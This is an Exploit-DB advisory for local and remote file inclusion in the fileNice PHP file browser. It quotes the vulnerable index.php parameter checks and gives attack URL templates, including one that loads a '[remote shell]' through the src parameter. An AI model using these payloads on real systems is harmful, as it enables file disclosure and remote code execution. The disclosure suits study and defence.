fileNice PHP file browser - Local/Remote File Inclusion

EDB-ID:

10845

CVE:

N/A


Author:

e.wiZz

Type:

webapps


Platform:

PHP

Date:

2009-12-31


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

FileNice file browser RFI&LFI


By: e.wiZz!

#######Script site: http://filenice.com




In the wild...

###################################

######Vulnerability:


index.php

...
if(isset($_GET['view'])){
	if(substr($_GET['view'],0,2) != ".." && substr($_GET['view'],0,1) != "/" && $_GET['view'] != "./" && !stristr($_GET['view'], '../')){
		$out = new FNOutput;
		$out->viewFile($_GET['view']);
	}else{
		// someone is poking around where they shouldn't be
		echo("Don't hack my shit yo.");
		exit;	
	}
}else if(isset($_GET['src'])){
	if(substr($_GET['src'],0,2) != ".." && substr($_GET['src'],0,1) != "/" && $_GET['src'] != "./" && !stristr($_GET['src'], '../')){
		$out = new FNOutput;
		$out->showSource($_GET['src']);
	}else{
		// someone is poking around where they shouldn't be
		echo("Don't hack my shit yo.");
		exit;	
	}

...

here is some security check for dir-traversal(can be bypassed),but there is no check for RFI,
also you can see source of any file which is in parent directory:

http://inthewild/path/index.php?src=[lfi]   // index.php or whatever
http://inthewild/path/index.php?src=[remote shell]

btw. there is lot of other vulnerabilities...happy huntin' :)